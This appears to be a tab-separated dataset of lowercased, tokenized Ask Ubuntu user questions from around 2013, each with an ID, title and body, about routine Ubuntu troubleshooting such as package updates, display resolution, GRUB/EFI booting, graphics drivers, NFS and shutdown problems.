298726	sudo apt-get update does not work ?	i 'm running newly installed ubuntu 12.04 in my computer . after the commandsudo apt-get update , my terminal shows the following message : reading package lists ... done after that , nothing happens . what 's wrong ?
298727	ubuntu cloud with four servers	i searched a lot about this question before ask , sorry for the title being so short and generic at the same time , but my problem is more related to a merge from a noob and expertise . i have 4 ( four ) servers , all dell , with 32gb ram xeon etc ... i would like to build a private cloud , where these machines run together creating one super server , to be able to install several virtual machines ( virtuabox or vmware ) and at the config from these vm set how much ram and processors it can be using at these vm , but these are numbers calculated from all my servers . is this possible or iâ´m trying something impossible for now ? i searched and found that cloud is only possible with 6 servers , but is it possible with 4 ? best regardâ´s . sorry for my bad english , i made my best !
298728	where can i find the changelog for ubuntu touch ?	i am using ubuntu on my nexus phone and i would like to know where i can find updates to what is changing on the device so i can follow along with development .
298732	why i ca n't change my password in ubuntu ?	i tried multiple times in terminal to change my password . but it throwing error but i filled up all requirements . naga @ naga : ~ $ passwd current password : new password : re-enter password : password does not meet requirements passwd : authentication token manipulation error passwd : password unchanged naga @ naga : ~ $
298734	problem with starting ubuntu from usb	i installed ubuntu on an usb drive with this program : http : //www.linuxliveusb.com/en/download as it said in the guide , i wanted to start it directly from the usb with `` virtualize_this_key.exe '' but it did n't work . it showed following screen .
298741	linux server and lamp basic questions	i am pretty new to the linux environment . i have been asked to setup a linux server and lamp . i do have a background on network and windows server admin , however when it gets to linux servers , i do n't know where to start . questions : any good books or links for a newbie on how to administer a linux server ? where is the setting for admin control on a linux server , such as dns , dhcp , etc. ? i googled a few things about lamp , but i am not sure whether the required applications have already been installed .
298742	run configuration script at x session resume	on ubuntu 13.04 i have to manually configure the touchpad since a bug prevents me using the standard configuration tool ( changes do n't save ) . however i created a script that sets up velocity , acceleration and scrolling , configured it to run at sartup and it works . the problem rises when i resume after suspension : especially the scrolling settings ( the easiest to check ) disappear . following other questions and answers i wrote this script ( which contains the same commands i used in the over-mentioned one ) located in /etc/pm/sleep.d/zztouchpad : # ! /bin/sh case `` $ 1 '' in resume|thaw ) xinput -- set-prop `` cyps/2 cypress trackpad '' `` device accel constant deceleration '' 2 xinput -- set-prop `` cyps/2 cypress trackpad '' `` device accel velocity scaling '' 35 xinput -- set-prop `` cyps/2 cypress trackpad '' `` synaptics scrolling distance '' -20 , -20 esac but it does n't work at all . thnks for help ! edit i found out that the script works when suspending with pm-suspend or pm-suspend-hybrid , but when suspending from the system menu or closing the laptop lid it does n't . it seems the error is 'unable to connect to x server ' . so , the question better be rephrased : where should i put those commands for them to be executed when the x session is resumed ? i tried ~/.xinitrc , a file under ~/.xinitrc.d and ~/.xsessionrc . any suggestions ?
298743	redirect stdout and stderr so that it is displayed or stored nowhere	i want a process to just not print its stdout or stderr output . i know that i can do something like program > output.txt 2 > errors.txt and then rm output.txt errors.txt but its not elegant . i want that they should not at all be stored anywhere in the first place . any idea how to do so ?
298747	coloured view in vim editor not working in ubuntu 12.04	my vim editor version vim - vi improved 7.3 ( 2010 aug 15 , compiled may 4 2012 04:19:52 ) when i open a file ( shell script , etc ) with it , all the text are on same color . it 's not user friendly . how can i solved it ? i tried with adding syntax on in ~/.vimrc file . but no use . it says e319 : sorry , the command is not available in this version : syntax on
298748	add windows programs from virtualbox to the ubuntu programs menu	i have been using ubuntu for years now , but for a few months i got my hands on a shiny new imac , while i had it i messed around with parallels desktop and fell in love with many of its features . one of the features in particular is being able to add windows programs to the dock in osx . i mostly use virtualbox/parallels for autocad , solidworks , and qucik books . so what i would like to do is be-able to install autocad for example in virtual box , and then make a shortcut directly to autocad and place it on the ubuntu panel right along with the rest of my ubuntu apps . so basically if i click on the autocad icon in my ubuntu panel , it will open virtual box in seamless mode and automatically launch autocad , or if i click solidworks , it will automatically open in seamless mode , and auto launch solidworks , etc ... this is by far one of the best features in parallels desktop for mac and i would be great to beable to reproduce this function in virtual box . also , i know they have or had , im not sure , parallels desktop for linux , but it does n't have the same features as it does in os x , at least thats what i understand .
298761	what linux distribution is less power hungry than ubuntu 12.04 ?	my notebook is a compaq pressario cq71 . the battery life is like 1:45 h. when win vista was installed on it , it was like 3 h. now i like linux more , but this distribution ( ubuntu 12.04 ) is consumes too much power . so , what linux distribution is less power hungry than ubuntu 12.04 ? besides being less power hungry the linux should be have the same graphic effect option ( compiz , cairo dock , ... ) like ubuntu 12.04 . thanks in advance . regards
298775	what should i choose ? lxc vs openvz	as an alternative to virtualizing several ubuntu servers im looking into the possibility of using containers . but i am not sure if i should go for openvz or lxc . can anyone recommend one of them , or maybe list pros and cons ?
298779	wireless does not work with latitude d820 and ver . 13.04	i can not get dell latitude d820 wireless to work on 13.04 version of ubuntu . no additional drivers are listed . any ideas ?
298781	how can i install openoffice ?	hi i 'm new to ubuntu having finally given up the ghost with windows 8 ! on ubuntu 13.04 , i 've used the software centre to install a number of apps including skype . however openoffice is proving very tiresome . this is the download : apache_openoffice_incubating_3.4.1_linux_x86-64_install-deb_en-us.tar.gz it wo n't install from the software centre , or from double click . right click does n't offer an install option .
298788	is it possible to upgrade from 12.04 lts to 13.04 ?	i would like to upgrade from 12.04 lts to 13.04 and since it wo n't give the upgrade option i need some one to guide me please .
298793	connect button greyed out for wireless network authentication required menu	i am trying to connect to a network using the options : wireless security : wpa & wpa2 enterprise authentication : tls i have entered values for my identity , user certificate , ca certificate , private key and private key password . however the `` connect '' button is greyed out . is this dialogue performing some kind of check that is failing , or is this just a bug ? ubuntu 12.04
298807	shutdown does not power off computer with db derby service	i set service db derby by this instructions fresh install ubuntu 12.10 - 17. apache db derby # ! /bin/bash # # startup script for derby # # # begin init info # provides : derby # required-start : $ remote_fs $ syslog # required-stop : $ remote_fs $ syslog # default-start : 91 2 3 4 5 # default-stop : 20 0 1 6 # short-description : start apache derby db at boot time . # description : provides a small simple java based db . # # # end init info # # chk con fig : 345 94 16 # description : derby startup script # to enable on bootup on redhat `` chkconfig -- level 35 derby on '' # to enable on bootup on debian `` update-rc.d derby defaults '' or the # slightly longer ( but better run levels ) `` update-rc.d derby start 91 2 3 4 5 . stop 20 0 1 6 . '' # see http : //blog.rimuhosting.com/2009/09/30/one-java-init-script/ homedir=/opt/db-derby derby_user=derby appname=derby # see http : //www.vogella.com/articles/apachederby/article.html for startup options runcommand= '' bin/startnetworkserver -h 0.0.0.0 '' stocommand=bin/stopnetworkserver logfile=/var/log/derby.log ... when derby is running service derby status derby ( pids 1503 ) is running . i can not shutdown computer with power off . shutdown ended in login screen . when i stop derby sudo service derby stop then i can shutdown computer with power off normally . what i should do to shutdown - power off computer correctly with running service db derby ?
298808	run a shell script from terminal	i have a shell script at /home/user/android-sdk-linux/tools . i wish to run the script from the terminal by typing ddms so i added : /home/user/android-sdk-linux/tools/ddms.sh to /etc/environment and run $ sudo source /etc/environment but ddms is fired from the terminal ? help will be appreciated .
298809	installing moonlight ? extracting .crx files ?	i am trying to install moonlight on my 13.04 64-bit ubuntu system . i am using chromium as my main browser and firefox as backup . i read that to install the moonlight downloaded .crx file in chromium , first i have to extract the .crx contents . can someone help me with the how-to to extract .crx file ? also , is there an easier way of installing moonlight ? and would my install cater to both of my browsers ?
298812	how to configure 13.04 nfs server for 10.04 client	after upgrading my nfs server to 13.04 , any attempts to mount a nfs share with a 10.04 client fails with the following error : mount.nfs : mount ( 2 ) : input/output error mount.nfs : mount system call failed i 've thoroughly check that the portmapper is running and no firewall is active . showmount shows correct share on server and on the client . i 've also tried with ip addresses instead of names . mounting with either nfs v3 or v4 fails . mounting with another 13.04 clients works also . nfs-common is installed on both server and client . did i miss something in the 13.04 upgrade on nfs side ? it should not be related but the server is running amd64 ubuntu 13.04 desktop and the client i386 ubuntu 10.04 server . both are up-to-date . connecting with an i386 ubuntu 12.04 server ( in a vm ) works also ... something seems broken in regards of nfs in ubuntu 10.04
298819	how to point grub to usable efi vmlinuz files . ?	on trying to install ubuntu 12.10 desktop amd64 to a desktop pc using a ga a75 ud4h motherboard ( which is using an amd 3870k apu with a new 1tb hdd ) following the advice in the motherboard manual and https : //help.ubuntu.com/community/uefi have now got to grub option screen for efi install . booting live dvd in efi mode gives `` secure boot is not enabled '' just before grub kernel option list shows . if the option to `` install ubuntu '' or `` try ubuntu without installing '' is selected gives `` can not read cd/0 '' and `` the kernel must be loaded first '' errors . using dvd or usb installation media gives same results and there has never been at any point an uefi entry in bios/firmware settings or boot device list/s . it might be helpful to say that have had an alternative non-linux os installing efi mode on this hardware giving a gpt installation automagically using usb installation media when the hdd space was completely unallocated space . the usb device was listed under hard drives in bios/firmware one time boot list and did not have an uefi entry . i.e . it installed efi although no efi or uefi entry was assigned to the device like what is shown in many tutorials regarding uefi installs . am trying to get to live session using efi mode . how to edit kernel or load kernel for efi mode `` try ubuntu without installing ? . fernando garcă­a 's answer and comments to this ask ubuntu question hints at the answer but does not share how . looking at the manual/website for grub2 gives the information on how to boot an os but when running .iso after booting ubuntu efi mode from dvd then dropping to command and entering search -f /vmlinuz or search -f /sbin/init no usable kernels are listed due to errors . ( no error codes given just confirms bad efi files . ) the output of ls -l at grub prompt
298822	how can i tell when files is done searching ?	when i search for files in files , it can take anywhere from a few seconds to several minutes for files to stop being added to the search results . sometimes i think the search is done , but then more files show up after i 've given up waiting . how can i know for certain when the search is complete , so i know i have n't missed anything ?
298825	pes 2013 on ubuntu	i '' m new to ubuntu and i do n't know how to install pes2013 . i 've already downloaded wine to run .exe but the installer wizard says : '' your system has n't been modified '' how can i install it ? ?
298827	why ca n't i get a screen resolution higher than 1024x768	i recently built a computer and instead of putting windows 7 on it i put ubuntu 13.04 . i 'm too cheap to buy a graphics card so , i 'm using my built-in intel g41 and the only screen resolution i can get is 1024x768 . i need a resolution of 1360x768 . i 've tried just about everything . i 've tried everything from xrandr in terminal to arandr from the software centre . i 'm starting to get a little frustrated because i switched to ubuntu for the simplicity of it all . this is what i get when i type xrandr in terminal : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 32767 x 32767 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 1280x1024_60.00 ( 0x252 ) 109.0mhz h : width 1280 start 1368 end 1496 total 1712 skew 0 clock 63.7khz v : height 1024 start 1027 end 1034 total 1063 clock 59.9hz 1360x768_60.00 ( 0x257 ) 84.8mhz h : width 1360 start 1432 end 1568 total 1776 skew 0 clock 47.7khz v : height 768 start 771 end 781 total 798 clock 59.8hz but , when i type xrandr -- addmode vga-1 1366x768_60_new it says : xrandr : can not find output `` vga-1 '' any help ?
298828	problem with the persistence of a live cd ?	i am not using an usb here , but i installed ubuntu 12.04 lts onto a cd and am trying to create a persistent bootable cd . my boot menu as you can see , i have tried to add `` persistent '' at the end of the boot options . but it has not helped to actually create the persistence i am looking for . if anyone could help , that would be great ! thanks : ) or even answer if this is possible ?
298842	how do i obtain and install larger mouse pointers - i am slightly visually impaired	i am totally new to ubuntu . just this morning ( wed may 22 , 2013 ) i installed ubuntu 12.04.2 64-bit desktop on my 2.5 year old laptop along side windows 7 . one of the reasons i installed ubuntu was to explore and employ the universal access options - i have some vision impairment . so far so good . however i need larger mouse pointers . the default is microscopically small , to me , and i have searched and searched ask ubuntu , the software center , etc . for a way to get a larger mouse pointer ( this is very easy in windows 7 ) . as a new user i would prefer to avoid command lines and configuration editors and do a simple install , as i would in windows 7 . how do i obtain and install a set of larger mouse pointers ? thank you very much for your attention to this question . and when i try `` for gnome classic and unity desktop the option to change the mouse pointer size or style is found in system settings - > appearance - > theme - > customize - > pointer : '' there is no 'customize . ' there are only 4 themes to choose from . i have looked at the `` questions that might already have your answer '' and , come on , ubuntu says it is easy for the disabled but following all these `` nightmarish '' procedures by a visually impaired person is a bit much to ask . sorry if i am coming across as lazy or stupid but after a while staring at these screens my eyes give out altogether ...
298843	what is happening here ? is unity crashing ?	hopefully someone can enlighten me about a baffling and frustrating issue ! sometimes when i am doing an installation or a removal , something weird happens . all the open windows disappear , and i see my desktop wallpaper . then all the windows reappear , but they have no menu bar , so i ca n't close them . the bar at the top of the screen ( with the clock and so on ) has also disappeared , as indeed has the unity launcher . when this happens , all i can do is wait for the process to finish , and then use ctrl+alt+delete to log out of ubuntu , then log back in again . only seems to happen if i am doing updates or installing/removing software . what exactly is happening here , has anyone else ever seen this , and perhaps most importantly , is there a way to stop this from happening ? my machine : dell inspiron 530 ati radeon hd6670 graphics card ( running the latest driver ) ram : 4gb and i 'm running 64 bit . there is n't really a `` step-by-step '' way to reproduce the issue because i can never predict exactly when it will occur . usually i 'm installing a program through software center or update manager , maybe running other things in the background - terminal , firefox etc . - and then everything flickers , all the windows disappear and then come back with no menu bars .
298846	how to prevent graphics mode from running	i installed ubuntu 12.04 and it was in text mode , so i did apt-get install gnome and now it starts in graphics mode no matter what i try . what i want to do is start in text mode and run the graphics mode when i need it with startx gnome . it is a server so graphics are not normally needed but there are occasions when graphics mode is handy , i also want to exit back to the command prompt when i quit graphics mode . i could do this easily with old versions of linux before this darn grub thing , like all grubs it is a pest . can any body help .
298849	how to dualboot 12.4.2 alongside windows 8 without wubi ?	i 've just bought a new acer laptop that came preinstalled with windows 8 in secure boot ( enabled ) . since wine can only do so much , i want to keep my windows8 and install ubuntu 12.4.2 alongside it , preferably as a secure install . i 've read up on it a bit so i know about disabling fast boot ( or whatever it 's called ) and i know that i should install both oses in the same ( uefi ) mode , but i 'm unclear about the following . issues : i 've read that wubi shouldn't/ca n't be used in my case and i 'm not sure how to go about doing the so-called `` normal dualboot '' that i saw mentioned somewhere on this site . i 've only ever installed ubuntu 10.4 on a laptop once , and this was primarily because i wanted to get rid of my crappy windows version , so it was n't dualboot ; ) i have no idea if it was a wubi install ( though given the fact that i managed to erase windows i 'm guessing no ) . all i know is i had made a liveusb using the appropriate iso and the universal usb installer , booted from this usb , and clicked through the menu that popped up automatically in order to erase windows and install ubuntu . i have now made a similar liveusb for ubuntu12.4.2 ( 64version ) for the dualboot install i want to do , but there 's a wubi file on the usb and that worries me . is this simply a 'bonus ' file put in the package for those who like it , or is it something that will run automatically if i try to boot using this liveusb ? if the latter , what should i do instead ? i 've read some conflicting info on ( re ? ) partitioning the hard drive : should i do some manual partitioning before attempting to install ubuntu , or is there a noob-friendly installer other than wubi that will take care of everything for me ? if i have to do it all manually , which program is best used for this and what would be a good division of disk space of my 500gb hdd , given that ubuntu will be my main os ? sorry about all the questions and thanks in advance !
298850	higher display resolution on acer 5755g	i am using acer aspire 5755g with nvidia geforce gt 630m ( 2gb ) and ubuntu 13.04 . the resolution set by default is 1366x768 and it is the highest possible to choose . i would like to use bigger resolution like 1920x1080 and i believe it is supported by both my video card and my monitor . can someone please tell me how to set my resolution to 1920x1080 ? thank you a lot !
298851	laptop nvidia bumblebee clarification	so this is partly clarification ( to help future users ) and partly questions to make sure i understand what 's going on . recently attempted to make the switch from macosx to ubuntu as i ca n't afford mac hardware for my purposes ( using blender 3d open source graphics program ) . i 'm selling my macbook pro & have bought an optimus iv custom build laptop with integrated intel graphics & an nvidia gtx660m , i7 etc . after fruitless days trying to successfully install nvidia drivers on a clean install of 12.04 using all methods i could find i decided i 'm not savvy enough for ubuntu to be my primary os for my work and couldnt risk it ( using 'blender ' ) . new plan , 2 hard drives ; 1st ssd for windows 7 upon which i 'll be running my work ( blender ) exclusively & thus reliably 2nd hdd for ubuntu , it looks like a great os that i 'm keen to learn & get to grips with for the future and i 'll be using it for 'everything else ' docs , file management and so forth . would still like to get the graphics to work on it though . today i clean installed 13.04 ( i thought as it 's newer , nvidia might play nicer ) . no proprietary drivers have ever been recognised by ubuntu on either 12.04 or 13.04 . i take it that ubuntu is n't recognising my nvidia card natively.. after reading this very informative article on nvidia drivers , i first tried installing bumblebee and things for the first time seem to be working , - i can 'switch my nvidia card on ' : now when i run glxspheres i get a framerate of ~60fps ( intel ivybridge mobile ) when i optirun glxspheres i get a framerate of ~120fps - opengl renderer ( gtx660m/pcie/sse2 ) the instructions seem to be that , whenever i wish to enable my nvidia glu for increased performance , enter terminal & type eg optirun chrome , or optirun blender etc . depending on which application i 'd like to make use of it.. great . my questions now : do i need to 'switch it off ' afterwards , or just exit the application ? i do n't play computer games . since i 'm going to be using my windows os & ssd for running blender and video editing ( as i can rely on it ) which applications would you recommend i use the optirun command for in ubuntu ? watching youtube videos ? watching vlc videos ? streaming from ubuntu via hdmi to my tv ? or is the intel integrated glu capable of comfortably dealing with those ? even if the intel is capable will the nvidia gpu give a better performance ? when i installed bumblebee did this automatically install nvidia drivers or is running 'optirun ' switching between intel drivers and nouveau drivers ? if switching to nouveau , i 'd like it to download and enable nvidia drivers for better performance . i 've tried to see which nvidia driver is recommended for my card as advised in the article above using : ubuntu-drivers devices ubuntu-drivers devices | grep recommended however nothing comes up.. from reading , looks like i need to run : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get upgrade sudo apt-get install nvidia-319 ( i 've read this is a good package for the 600 series cards ) . i think something that 's confusing about ubuntu are that there seem to be 5 ways to do the same thing , i 've seen commands that recommend 'install nvidia-current ' etc & that this will automatically pick the best drivers for you , seems to be a lot of conflicting information . seems like i can install primus according to this article sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install primus sudo apt-get install primus-libs-ia32 : i386 however what 's confusing here is that my terminal , when installing bumblebee , also instructed me to change the bumblebee.conf why ? a lot of real basics i 'm trying to understand here , your patience is much appreciated . laptop nvidia drivers bumblebee optimus primus
298853	how to reinstall newest linux kernel ?	hello i upgraded all packages on my ubuntu 13.04 , and kernel also . but in upgrading process kernel upgrade failed , and i must always after grub load select older kernel . it is a terminal command to reinstall latest kernel ? sorry about my english ( i 'm polish )
298857	how to add android studio to the launcher ?	i 'm trying to install the android studio so that i can launch it from a launcher instead of via terminal . can someone give specific instructions please ? i think this is something to do with the permissions in /usr/local/ i tried doing a chmod this and still did n't work tried modifying the android studio launcher file that was in /usr/share/applications/ and it would not launch the app under my user , as root fine , but thats not very practical
298861	how to make ubuntu show date and time on files screen ?	ubuntu 12.04 used to show date and time of files in directory in files . with 13.04 , only date is shown ( for files created before the current date ) . how can i make date and time to show in files on 13.04 ? thank you in advanced .
298867	13.04 : shutdown/suspend works in live-usb , not in installed system	my brother , a windows vista user , agreed to have his computer improved by installing the latest ubuntu to it . however , i keep having a weird problem with the raring ringtail installation on his acer aspire 5710z : when i ran the system from a live usb , suspend and shutdown worked just fine . once i installed the system , suspend will bring me back to the password request after showing a black screen for a few seconds . worse than that : when i shut the system down it does so , but does not power off ! pressing escape during shutdown shows this output : * asking all remaining processes to terminate ... [ ok ] * killing all remaining processes ... [ fail ] modem-manager [ 742 ] : < info > caught signal 15 , shutting down ... * deactivating swap ... [ ok ] umount2 : device or resource busy umount : /var/lib/ureadahead/debugfs busy - remounted read-only * unmounting local filesystems [ ok ] umount : /run/lock : not mounted umount : /run/shm : not mounted mount : / is busy * will now halt this is where it stops . ( same for restart , just the last line says `` will now restart '' . ) some posts suggest to manipulate the acpi parameter in the grub file ( `` force '' or `` noirq '' ) or switching the speech dispatcher on in /etc/default/speech-dispatcher . none worked for me to get shutdown going . i would terribly appreciate if somebody could enlighten me what the live system and the installed system do so differently that this problem occurs , or at least suggestions what may be worth trying given the console output . many thanks in advance !
298868	skype video not working on 64-bit ubuntu	ca n't get video to work in skype ! when i go into my video options to test video i get a black screen . i know that there is an ld_preload thing that i have to add , but for some reason it never works on 64 bit ! am i doing something wrong ? it used to work on 32 bit .
298870	need to re-install grub2 to /boot pbr ( not mbr ) . use live cd and the grub-install ?	i have dual boot system ( windows xp and ubuntu 12.04 ) that was running fine until an auto-update of grub2 this past week-end . i had been using the windows boot loader to choose the o/s , which allowed me to retain the original microsoft mbr on the hard drive . the setup had grub2 in a /boot partition ( /dev/sda3 ) visible to the system bios in the first 137mb . grub2 had been installed to the pbr in that partition . i had modified the windows boot.ini file to point to a binary file copied from the /boot pbr , per a procedure whose url escapes me at the moment , but is well known to dual-booters i believe . i can run the latest ubuntu 12.04 live cd and get access to all partitions on the hard drive . i can run fdisl -l and blkid and see all of the particulars of the various partitions . what i am uncertain of is the exact incantation to use to cause grub-install to do only what i want to do to fix up my boot partition , assuming grub-install is indeed the way to go . incidentally , i did look at the boot-repair tool and did not see it offering me the option of installing grub to other than the hard drive mbr . my boot partition is /dev/sda3 and the only option boot-repair appeared to permit for grub re-installation was to /dev/sda , rather than /dev/sda3 . i take that to mean boot-repair will only install to the mbr , and not the pbr of /dev/sda3 , though the menu labels are bit cryptic and i am guessing at meanings here . i 'm thinking the grub-install script is the way to go , but my first attempt produced an error message that suggested it could not find a /boot directory . i suspect the live cd session and its separate file system may be causing confusion about that . i assume there is a specific syntax i should be using to get around that , but am just about at the limit of my know-how . i hesitate to tinker with syntax or script options and risk irreparably damaging my installation . i would be most appreciative if an expert coder would suggest a grub-install command line that will re-install grub2 on /dev/sda3 when executed from a terminal command line in an ubuntu 12.04 live cd session . for educational purposes , it would also be nice to have an explanation of the rationale for the specific syntax .
298873	ubuntu 13.04 compizconfig problems	i 've just upgraded to 13.04 and when i open compizconfig the screen turns black for about 10 seconds and then it comes back but there is nothing besides the desktop and the program , the panel and window borders disappear .
298877	which image viewer is able to show coordinates ?	i need an image viewer to help me see the xy coordinates inside an image ( mouse cursor position relative to top left corner of the image ) . could somebody please recommend me one ?
298881	13.04 unity ( dual monitors ) graphics suddenly broken for no reason	edit : re-opened since the errors came back . and previous solutions did n't work . i 've been happy with 13.04 since launch . this week however something odd started happening . sometimes after login , the desktop will show , without the global menu or dock . can not open dash etc . sometimes , after rebooting it would just work again , and i can continue my work . suddenly today , this got far worse . now my pc will show the dock and global menu , but i can not access the desktop ( invisible icons , right-click does not work ) , and the background looks completely borked ( see screenshot below ) . the mouse when over certain windows is constantly flickering . i 've attempted to completely re-install ubuntu 13.04 , but even this did n't solve the problem . i have my /home on a separate partition , so i have all my current settings saved , could it be something there ? i still can not work for long period , because the entire desktop will at random crash , and i lose all window decorations , etc . i have a deadline for friday , and my system is in-operable . does anyone know how i can debug/fix this issue ? edit : installing proprietary drivers does not fix the problem . in fact it results in a blank screen on boot . edit : extra info , i can boot into my windows 8 partition and play games without any display issues . edit : lspci -nn output edit : today i downgraded to 12.10 , using the same extended partition for my home folder . same problems . however , if i log into a guest session , then none of these issues exist . everything works the way it normally does . is there an issue with my home folder ? edit : it 's starting again . something is definitely wrong with unity in 13.04 . it keeps changing my monitor settings . i boot up and see the following as soon as i go into the monitor settings to change the monitor settings , the ui breaks like in previous examples , and the only way to fix it is to remove the compiz-1 folder and monitors.xml folder , but after reboot i still see the two desktops overlayed like in the image . 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0100 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:02.0 display controller [ 0380 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0112 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 3 [ 8086:1c14 ] ( rev b5 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation z68 express chipset family lpc controller [ 8086:1c44 ] ( rev 05 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 6 series/c200 series chipset family 4 port sata ide controller [ 8086:1c00 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 00:1f.5 ide interface [ 0101 ] : intel corporation 6 series/c200 series chipset family 2 port sata ide controller [ 8086:1c08 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati turks xt [ radeon hd 6670 ] [ 1002:6758 ] 01:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati turks/whistler hdmi audio [ radeon hd 6000 series ] [ 1002 : aa90 ] 03:00.0 usb controller [ 0c03 ] : etron technology , inc. ej168 usb 3.0 host controller [ 1b6f:7023 ] ( rev 01 ) 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) 05:00.0 pci bridge [ 0604 ] : integrated technology express , inc. device [ 1283:8892 ] ( rev 30 ) edit : adding possible related output $ /usr/lib/nux/unity_support_test -p opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd turks opengl version string : 3.0 mesa 9.1.1 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes output from unity -- replace : $ unity -- replace compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : starting plugin : opengl compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2013-05-23 02:21:03 unity.favorite.store favoritestore.cpp:131 unable to load desktop file : /usr/share/app-install/desktop/opera.desktop warn 2013-05-23 02:21:03 unity.favorite.store favoritestore.cpp:144 unable to load favorite for uri 'application : ///usr/share/app-install/desktop/opera.desktop' warn 2013-05-23 02:21:03 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2013-05-23 02:21:03 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... warn 2013-05-23 02:21:03 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/google-chrome.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-05-23 02:21:03 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2013-05-23 02:21:03 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2013-05-23 02:21:03 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct bus error ( core dumped )
